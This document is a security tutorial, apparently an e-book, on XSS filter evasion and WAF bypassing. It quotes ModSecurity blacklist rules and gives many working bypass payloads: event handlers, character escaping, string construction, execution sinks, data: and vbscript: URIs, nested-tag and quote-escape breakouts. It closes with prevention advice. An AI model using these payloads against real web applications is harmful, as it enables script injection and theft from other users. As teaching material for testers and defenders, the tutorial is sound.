XSS Filter Evasion and WAF Bypassing Tactics
We will analyze various levels of evasion and bypassing tactics for XSS payloads.
Introduction
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise trustworthy websites. The flaws that allow these attacks to succeed are common and can be found wherever a web application includes user input in its output without validating or encoding it.
Over the years, many security researchers have created guides and cheat sheets to help security professionals test for Cross-Site Scripting flaws. The most well-known is the "XSS Filter Evasion Cheat Sheet," which was created by RSnake and later donated to OWASP. Cure53's HTML5 Security Cheatsheet is another interesting project.
In this book, we will not analyze the vectors reported in the cheat sheet one by one, but rather identify which of them are possible scenarios we may encounter and how to overcome them.
The most common scenarios you will come across are:
The XSS vector is blocked by the application or by something in front of it (for example, a WAF).
The XSS vector is sanitized.
The XSS vector is filtered or blocked by the browser.
We'll look at several evasion tactics that get around the weakest rules and yield effective XSS bypass vectors.
Bypassing Blacklisting Filters
Filters in blacklist mode are the most commonly used because they are easy to deploy. Their goal is to identify specific patterns and prevent malicious behavior. It all comes down to "patterns": the more accurate they are, the more attacks they will prevent.
Script Code Injection
The <script> tag is the primary method for executing client-side scripting code such as JavaScript.
Getting Around Weak Tag Banning
Filters may be weak and fail to cover all possible cases, which allows them to be bypassed. The following are just a few examples of how to get around weak rules.
ModSecurity > Script Tag Based XSS Vectors Rule
For example, this is how ModSecurity filters the <script> tag: SecRule ARGS "(?i)(<script[^>]*>[\s\S]*?<\/script[^>]*>|<script[^>]*>[\s\S]*?<\/script[[\s\S]]*[\s\S]|<script[^>]*>[\s\S]*?<\/script[\s]*[\s]|<script[^>]*>[\s\S]*?<\/script|<script[^>]*>[\s\S]*?)"
Obviously, this is not the only way to inject script code. There are several other ways to run our code, such as different HTML tags and their related event handlers.
Here's a small tool. https://github.com/evilcos/xss.swf
Events are how HTML DOM adds interactivity between a website and its visitors; this is accomplished simply by executing client-side code (e.g., JavaScript).
Almost all event handler identifiers begin with on, followed by the event name. One of the most commonly used is onerror: <img src=x onerror=alert(1)>
But there are many other events.
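To see why a rule that only targets the <script> tag is not enough, we can port the ModSecurity pattern quoted above to a JavaScript regular expression and run it against both vectors. This is only a sketch: the inline (?i) is replaced with the i flag, scriptTagRule is a name chosen for illustration, and we assume JavaScript's regex engine behaves like ModSecurity's for these two inputs.

```javascript
// Port of the script-tag pattern quoted above; (?i) becomes the `i` flag.
// Assumption: JavaScript regex semantics match the original engine for these inputs.
const scriptTagRule = new RegExp(
  String.raw`(<script[^>]*>[\s\S]*?<\/script[^>]*>|<script[^>]*>[\s\S]*?<\/script[[\s\S]]*[\s\S]|<script[^>]*>[\s\S]*?<\/script[\s]*[\s]|<script[^>]*>[\s\S]*?<\/script|<script[^>]*>[\s\S]*?)`,
  "i"
);

const scriptVector = "<script>alert(1)</script>";
const eventVector = "<img src=x onerror=alert(1)>";

// The rule catches the classic tag-based vector...
const scriptBlocked = scriptTagRule.test(scriptVector);
// ...but has nothing to say about an event handler on another tag.
const eventBlocked = scriptTagRule.test(eventVector);

console.log({ scriptBlocked, eventBlocked });
```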
Below are some HTML 4 tag examples:
Below are some HTML 5 tag examples:
From a defensive standpoint, the solution is to filter all events that begin with on so that this injection point cannot be used. This is a very common regex that you may come across: (on\w+\s*=)
Thanks to a mix of HTML and browser "dynamisms", we can easily bypass this first filter:
So, we have an "upgrade": (?i)([\s\"'`;\/0-9\=]+on\w+\s*=)
But there is still an issue. Because some browsers convert certain control characters to a space, the \s meta-character alone is insufficient to cover all possible characters.
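A small harness makes the gap visible. The sketch below runs the two patterns from the text against three sample inputs; the last one places a NUL byte between the attribute name and the equal sign. The sample inputs are our own, the patterns are evaluated by JavaScript's regex engine rather than the WAF's, and whether a given browser tolerates that byte depends on its version, so treat this as an illustration of the regex behaviour only.

```javascript
// Patterns taken from the text; the `i` flag replaces the inline (?i).
const basicRule = /(on\w+\s*=)/;
const upgradedRule = /([\s"'`;\/0-9=]+on\w+\s*=)/i;

// Hypothetical sample inputs. The last one has a NUL byte before "=".
// Assumption: browser tolerance for that byte is version-dependent.
const samples = [
  "<img src=x onerror=alert(1)>",
  "<svg/onload=alert(1)>",
  "<svg onload\x00=alert(1)>",
];

const results = samples.map((input) => ({
  input: JSON.stringify(input), // makes the control character visible
  basic: basicRule.test(input),
  upgraded: upgradedRule.test(input),
}));

console.table(results);
```

Neither pattern matches the third sample, because \s does not include the NUL byte and the pattern expects the equal sign right after optional whitespace.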
Here are some bypasses:
We have the first set of control characters that can be used between the event name attribute (for example, onload) and the equal sign (=) character, or just before the event name:
Browsers, on the other hand, are constantly evolving, so some of the permitted characters may no longer work. Gareth Heyes has created two fuzzer tests on Shazzer Fuzz DB:
• Characters allowed after the attribute name.
• Characters allowed before the attribute name.
You can run them in your browser or view the results from previously scanned browsers.
To date, a valid regex rule should be the following:
Keyword Based Filters
Signature-based filters may also try to limit the execution of scripting code by blocking particular keywords, such as alert, javascript, eval, and so on.
Let's have a look at several "alternatives" for getting around these types of filters.
Character Escaping
JavaScript has a number of character escape types that let us write code that still executes without appearing in its literal form. Let's pretend we need to get around a filter that blocks the alert keyword in the following scenarios. For the moment, we're ignoring the fact that there are alternatives (see prompt, confirm, etc.).
Character Escaping > Unicode
alert(1) Alert(1) <--- Blocked
Here we see Unicode escaping without using native functions:
Here is Unicode escaping using native functions. Note that eval is just one of many:
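As a minimal sketch of the idea, the snippet below defines a hypothetical keyword filter (blocksAlert) and a stub that stands in for the browser's alert(), then shows that the Unicode-escaped identifier slips past the filter yet still resolves to the same function when evaluated. The filter, the stub and the variable names are assumptions made for illustration.

```javascript
// Stub standing in for the browser's alert(); it records calls instead of showing a dialog.
const calls = [];
globalThis.alert = (value) => { calls.push(value); };

// Hypothetical keyword filter: rejects any input containing "alert".
const blocksAlert = (input) => /alert/i.test(input);

const plain = "alert(1)";
const escaped = "\\u0061lert(2)"; // the characters \u0061 followed by lert(2)

console.log(blocksAlert(plain));   // true
console.log(blocksAlert(escaped)); // false

// eval is the native function here: the parser reads \u0061lert as the identifier alert.
(0, eval)(escaped);
console.log(calls); // [ 2 ]
```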
Character Escaping > Decimal, Octal, Hexadecimal
If the filtered vector is within a string, there are several other escapes we can use in addition to Unicode:
eval('\141lert(1)') <----- Octal escaping
eval('\x61lert(1)') <----- Hexadecimal escaping
&#x61; <----- Hexadecimal Numeric Character Reference (NCR)
&#97; <----- Decimal NCR
'\a\l\ert(1 <----- Superfluous escape characters
All of these escapes can be combined: <img src=x onerror="\u0065val('\141\u006cert\(1)')"/>
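To check that these string escapes really are equivalent, we can evaluate each literal and compare the results. The sketch below is an assumption-laden test bench, not a filter bypass in itself: the literals object is our own, and indirect eval is used so that the legacy octal escape is parsed as non-strict code.

```javascript
// Each value is the source text of a string literal, as a keyword filter would see it.
const literals = {
  octal: "'\\141lert(1)'",
  hex: "'\\x61lert(1)'",
  unicode: "'\\u0061lert(1)'",
  superfluous: "'\\a\\l\\ert\\(1\\)'",
};

// None of the source texts contains the keyword itself.
const keywordHidden = Object.values(literals).every((text) => !text.includes("alert"));

// Indirect eval runs as non-strict global code, where octal escapes are still accepted.
const decoded = {};
for (const [name, text] of Object.entries(literals)) {
  decoded[name] = (0, eval)(text);
}

console.log(keywordHidden);
console.log(decoded);
```

Every entry decodes to the same string, which still needs an execution sink such as eval before it runs.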
Constructing Strings
To get around filters, you need to know how to build strings. The alert keyword, for example, is blocked as usual, but "ale"+"rt" is most likely not detected. Let's have a look at some examples.
JavaScript has several functions that are useful for creating strings:
/ale/.source+/rt/.source
String.fromCharCode(97,108,101,114,116)
atob("YWxlcnQ=")
17795081..toString(36)
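The four expressions above can be verified side by side. This is a small sketch with names of our own choosing (built, allEqual); it assumes a runtime where atob is available as a global, which is the case in browsers and in recent Node.js versions.

```javascript
// Each expression builds the same string without the keyword appearing literally.
const built = [
  /ale/.source + /rt/.source,                  // regex source concatenation
  String.fromCharCode(97, 108, 101, 114, 116), // character codes
  atob("YWxlcnQ="),                            // Base64 decoding
  (17795081).toString(36),                     // base-36 number formatting
];

const allEqual = built.every((value) => value === "alert");

console.log(built);
console.log(allEqual);
```

The result is only a string; a property lookup or an execution sink is still needed to turn it into a call.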
Execution Sinks
We've previously used the eval function to run code, as well as the events associated with various tags. Execution sinks are functions that parse a string as JavaScript code, and JavaScript provides various options. We need to look at these functions because, if we can control the input to one of them, we can run JavaScript code!
The following are just a few sinks; for a complete list, refer to the DOM XSS Wiki:
An interesting variation of the Function sink is: [].constructor.constructor(alert(1))
[] <------ Object
.constructor <------ Array
.constructor <------ Function
(alert(1)) <------ XSS Vector
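The chain can be traced step by step. In the sketch below, alertStub is a stand-in for the browser's alert() and the other names are ours. It also shows a detail worth knowing: in the vector as written, alert(1) is an ordinary argument expression, so it runs before Function is called, whereas a string argument is what makes Function behave as a sink.

```javascript
// [] is an Array instance: its constructor is Array, and Array's constructor is Function.
const FunctionViaArray = [].constructor.constructor;
console.log(FunctionViaArray === Function); // true

// With a string argument, Function is a sink: the string becomes the function body.
const fromString = FunctionViaArray("return 6 * 7");
console.log(fromString()); // 42

// Stub standing in for alert(); records calls instead of showing a dialog.
const calls = [];
const alertStub = (value) => { calls.push(value); };

// The argument expression is evaluated first, so the stub runs during this line.
const viaArgument = FunctionViaArray(alertStub(1));
console.log(calls); // [ 1 ]
```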
Pseudo-protocols
javascript: is an "unofficial URI scheme", commonly referred to as a pseudo-protocol. It is useful for invoking JavaScript code from within a link. Most filters recognise the javascript keyword followed by a colon character as a frequent pattern: <a href="javascript:alert(1)">
Note that javascript: isn't required for event handlers, so we should avoid it there. Because the pseudo-protocol is usually introduced within a string, we can use all of the previous techniques.
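As one hedged illustration, take the numeric character references from the previous section. The sketch below uses a hypothetical filter (blocksJavascriptScheme) and a deliberately simplified decoder (decodeNumericReferences) that stands in for the decoding an HTML parser applies to attribute values; a real parser handles many more cases.

```javascript
// Hypothetical filter: blocks the keyword followed by a colon.
const blocksJavascriptScheme = (value) => /javascript:/i.test(value);

// Simplified stand-in for HTML attribute decoding.
// Handles only numeric references such as &#x61; and &#97;.
const decodeNumericReferences = (value) =>
  value.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (_, code) =>
    String.fromCodePoint(
      code[0].toLowerCase() === "x" ? parseInt(code.slice(1), 16) : parseInt(code, 10)
    )
  );

const attributeValue = "jav&#x61;script:alert(1)";
const decoded = decodeNumericReferences(attributeValue);

console.log(blocksJavascriptScheme(attributeValue)); // false
console.log(decoded);                                // javascript:alert(1)
console.log(new URL(decoded).protocol);              // javascript:
```

The filter inspects the raw attribute text, while the URL is resolved only after decoding, which is why the two disagree.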
Let’s check out some examples.
javascript <------ Blocked
In addition to javascript:, there are also data: (RFC 2397) and the Internet Explorer exclusive vbscript:.
Let’s see how they work.
The data URI scheme lets us include small data items inline, together with their media type. This is what the structure looks like: data:[<mediatype>][;base64],<data>
The parts we are most interested in are the text/html media type and the base64 indicator, which allows us to encode our data. Let's have a look at some examples.
If javascript: is blocked:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== <----- Base64 Encoded
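The Base64 form can be reproduced in a couple of lines. This sketch assumes a runtime with the btoa and atob globals (browsers and recent Node.js versions); the variable names and the keyword check are ours.

```javascript
const html = "<script>alert(1)</script>";

// Base64-encode the markup and wrap it in a data URI with the text/html media type.
const encoded = btoa(html);
const dataUri = `data:text/html;base64,${encoded}`;

// A hypothetical filter looking for "javascript:" or "<script" finds neither.
const keywordVisible = /javascript:|<script/i.test(dataUri);

console.log(dataUri);
console.log(keywordVisible);         // false
console.log(atob(encoded) === html); // true
```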
<embed code="data:text/html,<script>alert(1)</script>">
data: <------ Blocked
If data: is blocked then use this:
Because it can only be used in Internet Explorer, the vbscript pseudo-protocol is not widely used. In IE11 in Edge mode, VBScript is no longer supported for the Internet zone. Let's have a look at some scenarios.
To invoke VBScript, we may use vbscript:, as well as vbs:
Unlike JavaScript, the code is case-insensitive (until version 8). This is really handy when the application alters the input. <iMg src=a onErRor="vBsCriPt:AlErT(4)"/>
If the vbscript: is blocked, we could use the usual encoding techniques:
Bypassing Sanitization
Rather than blocking the entire request, security systems frequently prefer to sanitise suspected XSS vectors. These are most likely the filters we'll come across during our tests. The most frequent method is to HTML-encode some essential characters, such as < (&lt;), > (&gt;), and so on. This isn't always enough, because it depends on where the untrusted data is inserted in the page.
String Manipulations
In some cases a filter may modify your vector by deleting dangerous strings, for example by removing <script> tags. A common mistake with this behaviour is that the rule removes only the first instance of the matched expression.
Removing HTML Tags
For example, <script>alert(1)</script> is correctly sanitized to alert(1), but the check is not performed recursively, so consider: <scr<script>ipt>alert(1)</script>
This could be a bypass!
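The behaviour is easy to reproduce. Below is a minimal sketch of such a filter, assuming it strips opening and closing script tags in a single pass; stripOnce and stripUntilStable are hypothetical names, and the second function shows the recursive variant for comparison.

```javascript
// Matches opening and closing script tags.
const SCRIPT_TAG = /<\/?script[^>]*>/gi;

// Single pass: every match in the ORIGINAL input is removed, and the result is never rechecked.
const stripOnce = (input) => input.replace(SCRIPT_TAG, "");

// Recursive variant: repeat until the output stops changing.
const stripUntilStable = (input) => {
  let current = input;
  let previous;
  do {
    previous = current;
    current = stripOnce(current);
  } while (current !== previous);
  return current;
};

const nested = "<scr<script>ipt>alert(1)</script>";

console.log(stripOnce("<script>alert(1)</script>")); // alert(1)
console.log(stripOnce(nested));                      // <script>alert(1)
console.log(stripUntilStable(nested));               // alert(1)
```

Removing the inner tag is exactly what reassembles the outer one, which is why a single pass is not enough.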
Even if the filter runs recursive checks, you should always test whether it is still exploitable. Changing the order of the injected strings can help.
Let's look at an example.
It is possible that the recursive checks run in a fixed order. They begin with the <script> tag, then move on to the next one, and so on, without going back to the beginning to see whether any dangerous strings have reappeared.
The following vector could be a bypass: <scr<iframe>ipt>alert(1)</script>
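The following sketch models that situation under stated assumptions: the filter has two rules (script tags, then iframe tags), each applied until stable, and it never returns to an earlier rule. The rule list and function names are hypothetical.

```javascript
// Apply one pattern repeatedly until the string stops changing.
const removeAll = (input, pattern) => {
  let current = input;
  let previous;
  do {
    previous = current;
    current = current.replace(pattern, "");
  } while (current !== previous);
  return current;
};

// Hypothetical rule order: script tags first, then iframe tags.
const RULES = [/<\/?script[^>]*>/gi, /<\/?iframe[^>]*>/gi];

// Ordered filter: each rule runs to completion, but earlier rules are never revisited.
const orderedFilter = (input) => RULES.reduce((text, rule) => removeAll(text, rule), input);

// Safer variant: repeat the whole rule set until nothing changes.
const repeatedFilter = (input) => {
  let current = input;
  let previous;
  do {
    previous = current;
    current = orderedFilter(current);
  } while (current !== previous);
  return current;
};

const vector = "<scr<iframe>ipt>alert(1)</script>";
console.log(orderedFilter(vector));  // <script>alert(1)
console.log(repeatedFilter(vector)); // alert(1)
```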
Of course, if we know or can guess the sequence, we can generate more complex vectors and possibly employ several character encodings, as we saw in the section on Bypassing Blacklisting Filters.
It all depends on the filter we're dealing with.
Escaping Quotes
It is not only about HTML tags: injection points are frequently found inside quoted strings. To neutralize quote characters, filters commonly place a backslash (\) before them.
To avoid bypasses, it's also necessary to escape the backslash itself. Consider the following code, in which we control the value randomkey but quotes are escaped: <script>var key = 'randomkey';</script>
If, instead of randomkey, we inject randomkey\'; alert(1); // then we have a bypass.
This is because the application escapes the apostrophe, transforming our input into randomkey\\'; alert(1); //. The two backslashes now form an escaped backslash, so the apostrophe is left unescaped, allowing us to terminate the string and inject the alert code.
One useful JavaScript method is String.fromCharCode(). It allows us to generate strings from a sequence of Unicode values.
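The quote-escaping bypass described above can be sketched as follows. The two escaping functions, the render helper and the alert stub are assumptions made for illustration; the generated source is run through the Function constructor so that we can observe whether the injected call executes.

```javascript
// Weak filter: escapes quotes but leaves backslashes alone.
const escapeQuotesOnly = (value) => value.replace(/'/g, "\\'");

// Stronger filter: escapes backslashes first, then quotes.
const escapeBackslashesAndQuotes = (value) =>
  value.replace(/\\/g, "\\\\").replace(/'/g, "\\'");

// The injected value: randomkey\'; alert(1); //
const payload = "randomkey\\'; alert(1); //";

// Builds the script body the page would contain.
const render = (escape) => `var key = '${escape(payload)}';`;

// Runs the script body with a stub in place of alert() and returns the recorded calls.
const run = (source) => {
  const calls = [];
  new Function("alert", source)((value) => calls.push(value));
  return calls;
};

console.log(render(escapeQuotesOnly));
console.log(run(render(escapeQuotesOnly)));           // [ 1 ]
console.log(run(render(escapeBackslashesAndQuotes))); // []
```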
We could also use the unescape method to decode an escaped string. For example, we can supply the escaped string with the .source technique: unescape(/%78%u0073%73/.source)
Even though this function has been deprecated, many browsers still support it.
In addition to this, there are the decodeURI and decodeURIComponent methods. In this case, characters need to be URL-encoded to avoid URI malformed errors.
These techniques are handy if you can inject into a script or event handler but can't use quotation marks because they are escaped. Remember that each of them returns a string, so you'll need an execution sink to actually run the code (e.g., eval).
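Here is a short sketch of the three quote-free techniques together. The variable names and the alert stub are ours; the Function constructor plays the role of the execution sink.

```javascript
// Three ways to obtain a string without typing a single quote character in the payload.
const fromCharCodes = String.fromCharCode(120, 115, 115);
const viaUnescape = unescape(/%78%u0073%73/.source);
const viaDecodeURIComponent = decodeURIComponent(/alert(%22xss%22)/.source);

console.log(fromCharCodes);         // xss
console.log(viaUnescape);           // xss
console.log(viaDecodeURIComponent); // alert("xss")

// The decoded value is still only a string; a sink is needed to run it.
// The stub stands in for the browser's alert() and records its argument.
const calls = [];
new Function("alert", viaDecodeURIComponent)((value) => calls.push(value));
console.log(calls); // [ 'xss' ]
```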
How to Prevent Cross-Site Scripting in Your Applications
Filtering alone is clearly not the solution: there are hundreds of ways to evade filters, and new vectors appear all the time. Filters do not prevent XSS attacks; they only eliminate a small fraction of the code patterns that could be used in an attack. In fact, filtering solves the wrong problem: it tries to block the patterns that deliver malicious code instead of fixing the flaw that lets that code run. By writing secure code that is not vulnerable to XSS, developers can do far more for application and user security than any filter. At the application level, this is accomplished with context-sensitive escaping and encoding. At the HTTP protocol level, the main weapon against Cross-Site Scripting is the use of appropriate HTTP security headers.
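As a rough sketch of what context-sensitive encoding means, the two helpers below handle two different contexts: HTML content and a string inside a script block. The function names are hypothetical and the helpers are intentionally minimal; in a real application, prefer the encoding facilities of your framework or template engine.

```javascript
// HTML content and quoted attribute context: encode the characters that can change the markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
const escapeHtml = (value) =>
  String(value).replace(/[&<>"']/g, (character) => HTML_ESCAPES[character]);

// Script context: emit a complete string literal, and encode "<" so that
// a closing script tag inside the data cannot end the script block.
const toScriptString = (value) =>
  JSON.stringify(String(value)).replace(/</g, "\\u003c");

const untrusted = "</script><img src=x onerror=alert(1)>";

console.log(`<p>${escapeHtml(untrusted)}</p>`);
console.log(`<script>var key = ${toScriptString(untrusted)};</script>`);
```

The same untrusted value is encoded differently in each place, which is the point: the right encoding depends on where the data lands.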
Thank you for reading my book. If you have any suggestions, feel free to reach me on Twitter: @N3T_hunt3r :)
Thanks,
Yasser Khan